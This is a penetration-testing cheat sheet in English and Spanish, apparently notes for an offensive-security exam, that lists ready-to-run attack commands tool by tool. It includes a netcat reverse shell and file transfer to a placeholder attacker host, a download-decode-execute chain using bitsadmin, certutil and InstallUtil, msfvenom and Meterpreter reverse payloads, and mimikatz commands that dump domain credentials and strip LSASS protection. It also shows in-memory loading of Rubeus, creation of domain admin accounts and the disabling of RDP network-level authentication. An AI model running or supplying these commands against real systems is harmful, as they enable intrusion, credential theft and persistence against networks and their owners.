Tools

bash

# View apache logs
sudo tail -f /var/log/apache2/access.log

# Find vulnerable private ssh keys
find /home/ -name "id_rsa"

# Descargar fichero de clave ssh por scp
scp linuxvictim@linuxvictim:svuser.key ./

# Buscar fichero de cache kerberos en linux
sudo find / -name "*krb5cc*"

# comprobar version de linux
uname -m
cat /etc/issue
# x86_64: para sistemas de 64 bits basados en Intel o AMD.
# i386 o i686: para sistemas de 32 bits basados en Intel o AMD.
# armv7l: para sistemas de 32 bits basados en ARM.
# aarch64: para sistemas de 64 bits basados en ARM.

# Who else is on this box (lateral movement)?
ls -la /home
cat /etc/passwd

# What executables have SUID bit that can be executed as another user?
find / -type f -user root -perm /u+s -ls 2>/dev/null

# Privilege escalation
sudo -l
cat /etc/sudoers
cat /etc/sudoers.d

# imprimir hora del sistema
date +"%b %d %T"

bitsadmin

# Tranfer
bitsadmin /Transfer myJob http://<attacker-ip>/bypass-clm.txt C:\Windows\Tasks\bypass-clm.txt

# Transfer, Decode and Execute
bitsadmin /Transfer myJob http://<attacker-ip>/bypass-clm.txt C:\Windows\Tasks\bypass-clm.txt && certutil -decode C:\Windows\Tasks\bypass-clm.txt C:\Windows\Tasks\bypass-clm.exe && del C:\Windows\Tasks\bypass-clm.txt && C:\Windows\Microsoft.NET\Framework64\v4.0.30319\installutil.exe /logfile= /LogToConsole=false /U C:\Windows\Tasks\bypass-clm.exe

certutil

# Encode EXE to B64
certutil -encode \\<attacker-ip>\visualstudio\CLMBypass\bin\Release\CLMBypass.exe \\<attacker-ip>\visualstudio\CLMBypass\bin\Release\CLMBypass.txt
certutil -encode \\<attacker-ip>\visualstudio\bypass-clm\bypass-clm\bin\x64\Release\bypass-clm.exe \\<attacker-ip>\visualstudio\bypass-clm\bypass-clm\bin\x64\Release\bypass-clm.txt

# Decode B64 to EXE
certutil -decode C:\Windows\Tasks\bypass-clm.txt C:\Windows\Tasks\bypass-clm.exe # intallutils

chisel



# Habilitar autenticación de contraseña
sudo sed -i 's/#PasswordAuthentication yes/PasswordAuthentication yes/g' /etc/ssh/sshd_config

# Reiniciar servicio ssh
sudo systemctl start ssh.service

# sudo nano /etc/proxychains.conf
socks5 127.0.0.1 1080


chisel server -p 8080 --socks5 --reverse

./chisel.exe client <attacker-ip>:8080 R:1080:socks

cmd

# View privileges of actual user - SeImpersonatePrivilege is a good privilege
whoami /priv

# View Domain group
net user ted /domain | find "Group"

# Create a domain admin user with RDP
net user <username> <password> /add /domain
net localgroup "Remote Desktop Users" <username> /add /domain
net group "domain admins" <username> /add /domain

# CLM Bypass
C:\Windows\Tasks\bypass-clm.exe

# InstallUtil
# To find InstallUtil Path
dir \Windows\Microsoft.NET\* /s/b | findstr InstallUtil.exe$

# Execute InstallUtils
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\installutil.exe /logfile= /LogToConsole=false /U C:\Windows\Tasks\CustomRunspace.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\installutil.exe /logfile= /LogToConsole=false /U C:\Windows\Tasks\CLMBypass.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\installutil.exe /logfile= /LogToConsole=false /U C:\Windows\Tasks\bypass-clm.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\installutil.exe /logfile= /LogToConsole=false /U C:\Windows\Tasks\SpoolSample.exe dc03.<domain> web05.<domain>
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\installutil.exe /logfile= /LogToConsole=false /U C:\Windows\Tasks\chisel.exe



# Deshabilitar NLA (Autenticación a nivel de red) para conectar por RDP sin problemas
reg.exe add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f

# Ver GPO politicas que aplican (o no) a mi equipo
gpresult /r /Scope Computer

# obtener información sobre las GPO que se aplican a tu equipo
reg.exe add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f

sc create mimidrv binPath= C:\Windows\Tasks\vmimidrv.sys type= kernel start= demand
sc start mimidrv

crackmapexec

# Check if samba is enable and extrack netbios name
crackmapexec smb <victim-ip> # -u <username> -p '<password>'

# Check if samba is enable and extrack netbios name all subnet
crackmapexec smb 172.16.218.0/24

dotnettojscript

DotNetToJScript.exe \\<attacker-ip>\visualstudio\DotNetToJScript\ExampleAssembly\bin\Release\ExampleAssembly.dll --lang=Jscript --ver=v4 -o shell.js

evil-winrm

evil-winrm -u <domain>\\administrator -H <NTLM-hash> -i <victim-ip>

gcc

gcc -static shell.c -o shell.elf
upx -9 shell.elf

gobuster

# Common directories on root
gobuster dir -u http://<victim-ip> -w /home/<username>/.fuzz/dirb/common_4459.txt -a "Mozilla/5.0 (Windows NT 6.2; rv:20.0) Gecko/20121202 Firefox/20.0" -e -t 23 -o xx_root_directories.fuzz

# Common files and directories on root
gobuster dir -u http://<victim-ip> -w /home/<username>/.fuzz/dirb/common_4459.txt -a "Mozilla/5.0 (Windows NT 6.2; rv:20.0) Gecko/20121202 Firefox/20.0" -e -t 23 -x .php,.html,.txt -o xx_root_files_directories.fuzz

hashcat

# Descifrar Hash NTLM v2
hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt --force 

# Descifrar Hash Ansible
hashcat -m 16900 hash.txt /usr/share/wordlists/rockyou.txt --force 

# kerberos
hashcat hashes.txt -m 13100 -a 3

# Buscar ID
https://hashcat.net/wiki/doku.php?id=example_hashes

hostrecon

. .\HostRecon.ps1
Invoke-HostRecon
Invoke-HostRecon | Out-File C:\Windows\Tasks\HostRecon.txt

impacket

# Obtener todos los usuarios del dominio, sin pedir pass y usando autenticación kerberos
GetADUsers.py -all -k -no-pass -dc-ip <victim-ip> <domain>/<username>

GetUserSPNs.py -request -k -no-pass -dc-ip <victim-ip> <domain>/<username>

GetNPUsers.py -k -no-pass -dc-ip <victim-ip> <domain>/<username> -usersfile users -format john -outputfile hashes

johntheripper

# Descargar clave por ssh
scp <username>@<victim-ip>:/home/<username>/.ssh/id_rsa ./

# Convertir clave a formato legible por johntheripper
python /usr/share/john/ssh2john.py id_rsa > <username>.hash

# Fuerza bruta
sudo john --wordlist=/usr/share/wordlists/rockyou.txt svuser.hash

metasploit

meterpreter

# View channels
channel -l



# Get Username
getuid

# Migrate shell to explorer process
migrate -N explorer.exe
migrate -N w3wp.exe
migrate -N spoolsv.exe

# Create a notepad obfuscate process and migrate
execute -H -f notepad
migrate XXXX

# Search file
search -f local.txt

# Enum LAPS
run post/windows/gather/credentials/enum_laps

msfconsole

# Windows 32 bits (para Word)
sudo msfconsole -q -x "use multi/handler; set payload windows/meterpreter/reverse_https; set exitfunc thread; set lhost <attacker-ip>; set lport 443; exploit"

# Windows 64 bits
sudo msfconsole -q -x "use multi/handler; set payload windows/x64/meterpreter/reverse_https; set lhost <attacker-ip>; set lport 443; exploit"

# Linux
# Atención a `MeterpreterTryToFork true` esto permite hacer algo similar a migrate en Windows, además, permite hacer uso del comando shell
sudo msfconsole -q -x "use multi/handler; set payload linux/x64/meterpreter/reverse_tcp; set lhost <attacker-ip>; set lport 443; set MeterpreterTryToFork true; exploit"

# Create workspace
workspace -a [WORKSPACE]

# Import from nmap
db_import all.xml

# Ver o añadir hosts
hosts
hosts -a [IP]

msfvenom

# 32 bits (para Word)
sudo msfvenom -p windows/meterpreter/reverse_https LHOST=<attacker-ip> LPORT=443 EXITFUNC=thread -f csharp

# 64 bits
sudo msfvenom -p windows/x64/meterpreter/reverse_https LHOST=<attacker-ip> LPORT=443 -f exe -o /var/www/html/shell.exe

# ASPX
sudo msfvenom -p windows/x64/meterpreter/reverse_https LHOST=<attacker-ip> LPORT=443 -f aspx -o /var/www/html/shell.aspx

# Linux
# La opcion `-k MeterpreterTryToFork=true` hace algo similar a migrate en windows, además, permite usar el comando shell
sudo msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=<attacker-ip> LPORT=443 -k MeterpreterTryToFork=true -f c

msfvenom -p windows/x64/meterpreter/reverse_https LHOST=<attacker-ip> LPORT=443 -f raw -o shell.bin

mimikatz



# Obtener NTLM de administrador del dominio en Web05
C:\Windows\Tasks\mimikatz.exe "privilege::debug" "lsadump::dcsync /domain:<domain> /user:administrator /csv" "exit"

C:\Windows\Tasks\mimikatz.exe "privilege::debug" "!+" "!processprotect /process:lsass.exe /remove" "sekurlsa::logonpasswords" "exit"

C:\Windows\Tasks\mimikatz.exe "token::elevate" "lsadump::secrets" "exit"

./mimikatz.exe "lsadump::lsa /patch" "exit"

mssql

Connect with windows-auth

mssqlclient.py <username>:<password>@<victim-ip> -port 1433 -windows-auth

Connect with password

mssqlclient.py <username>@<victim-ip> # 8<password>

netcat nc

# 
rlwrap -cAr nc -lvnp 443
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <attacker-ip> 443 >/tmp/f

# Compartir un fichero por netcat nc
# Atacante
cd /var/www/html
nc -nlvp 443 < /var/www/html/chisel

# Victima
cat > chisel < /dev/tcp/<attacker-ip>/443
chmod +x chisel

# Comprobar
md5sum chisel

# Pasar archivo de windows a linux
# linux para recibir archivo
nc -lp 1234 > mimi.txt
# windows para enviar
nc.exe <attacker-ip> 1234 < mimi.txt
# IMPORTANTE, CERRAR LA CONEXIÓN DESDE LINUX (EL RECEPTOR)

nmap

# Escaneo de versión con scripts a todos los puertos, tratar a todos como online, deteccion de sistema operativo, minimo de paquetes por segundo
nmap -sT -sC -sV -p- -Pn -A -vvv -T3 --min-rate=1000 -oA nmap/all -iL scope.txt

# Escanear subred
# Obtener información de netbios
nmap -sTV -A -Pn -A -p 3389 -vvv -oA nmap/subred 172.16.237.160,165,166,167,168 # super rápido
nmap -sTV -A -Pn --top-ports 25 -vvv -oA nmap/subred 172.16.237.160,165,166,167,168
nmap -sTV -A -Pn --top-ports 25 --min-rate=1000 -T5 -vvv -oA nmap/subred 172.16.237.160,165,166,167,168 # esto funciona pero mete mucha caña y se puede caer la conexion
# con proxychains
proxychains -q nmap -sT -Pn -n --top-ports 25 -T3 --min-rate=1000 -vvv -oA nmap/subred 172.16.237.150

ntlmrelayx

ntlmrelayx.py --no-http-server -smb2support -t smb://172.16.183.152

lapstoolkit

# Import
. .\LAPSToolkit.ps1
Import-Module .LAPSToolkit.ps1

# Discovers LAPS Delegated Groups
Find-LAPSDelegatedGroups

# Checks the rights on each computer with LAPS enabled for any groups with read access and users with `All Extended Rights`
Find-AdmPwdExtendedRights

# Find computers with LAPS enabled, discover password expiration and can discover randomized password
Get-LAPSComputers

ldapsearch

# get dump users
ldapsearch -Y GSSAPI -H ldap://dmzdc01.<domain> -D "<username>@<domain>" -W -b "dc=<base-domain>,dc=com" '(&(objectClass=user))'

ldapsearch -Y GSSAPI -H ldap://dmzdc01.<domain> -D "<username>@<domain>" -W -b "dc=<base-domain>,dc=com" "servicePrincipalName=*" servicePrincipalName

linpeas

# Grabar session de terminal
script -t 2> timing.log -a session.log # Despues lanzar comando y Ctrl + D para parar
scp <username>@<victim-ip>:session.log ./
cat session.log | aha --black --title "Terminal Session USER MACHINE" > linpeas_<username>_<machine>.html
rm timing.log session.log

powermad

# importar


# crete machine to RBCD attack
New-MachineAccount -MachineAccount <username> -Password $(ConvertTo-SecureString '<password>' -AsPlainText -Force) -Verbose

PowerShell

Add domain admin

net user <username> <password> /add /domain
net localgroup "Remote Desktop Users" <username> /add /domain
net group "domain admins" <username> /add /domain
runas /user:<username> "Powershell.exe /c whoami"
rdesktop -a 8 -z -x l -u <username> -p <password> -d <domain> -g 1366x768 <victim-ip> -r sound:off -r clipboard:CLIPBOARD -r disk:home=/home/<username>/osep

Add local admin with RDP

net user <username> <password> /add
net localgroup Administrators <username> /add
net localgroup "Remote Desktop Users" <username> /add
runas /user:<username> "Powershell.exe /c whoami"
rdesktop -a 8 -z -x l -u <username> -p <password> -g 1366x768 <victim-ip> -r sound:off -r clipboard:CLIPBOARD -r disk:home=/home/<username>/osep

Change user password

$creds = New-Object System.Management.Automation.PSCredential ("<domain>\<username>", (ConvertTo-SecureString "<password>" -AsPlainText -Force)) 
$UserPassword = ConvertTo-SecureString '<password>' -AsPlainText -Force 
Set-DomainUserPassword -Identity <username> -AccountPassword $UserPassword -Credential $creds -Verbose

Change user password and cover

$remote = New-Object System.Management.Automation.PSCredential ("<domain>\<username>", (ConvertTo-SecureString "<password>" -AsPlainText -Force)) 
$creds = ConvertTo-SecureString '<password>' -AsPlainText -Force 
Set-DomainUserPassword -Identity <username> -AccountPassword $creds -Credential $remote -Verbose

Check 64bit shell

[Environment]::Is64BitOperatingSystem

Check CLM

$ExecutionContext.SessionState.LanguageMode

Enable PSRemoting

Enable-PSRemoting -Force

Load Assembly

$data = (New-Object System.Net.WebClient).DownloadData('http://<attacker-ip>/Rubeus.exe')
$assem = [System.Reflection.Assembly]::Load($data)
[Rubeus.Program]::Main("s4u /user:<username>$ /rc4:<rc4> /impersonateuser:administrator /msdsspn:cifs/file01 /ptt".Split())

Run DLL

Rundll32 c:\windows\tasks\shell.dll,run

Runas

runas /user:<domain>\<username> powershell

PreviousNetwork Forwarding NextCRTO Cheat Sheet

Last updated 2 years ago

Was this helpful?